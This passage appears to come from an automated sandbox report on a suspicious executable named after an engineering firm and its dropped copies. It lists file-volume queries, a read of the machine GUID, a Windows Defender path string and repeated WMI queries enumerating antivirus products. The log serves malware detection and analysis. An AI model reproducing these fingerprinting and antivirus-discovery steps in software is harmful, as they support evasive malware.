              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeQueries volume information: C:\Users\user\AppData\Roaming\RTUZKYTc.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeQueries volume information: C:\Users\user\AppData\Roaming\RTUZKYTc.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4548014985.00000000070FF000.00000004.00000020.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4548014985.00000000070E0000.00000004.00000020.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4523604892.000000000160A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4548014985.00000000070E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: er\MsMpeng.exe
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
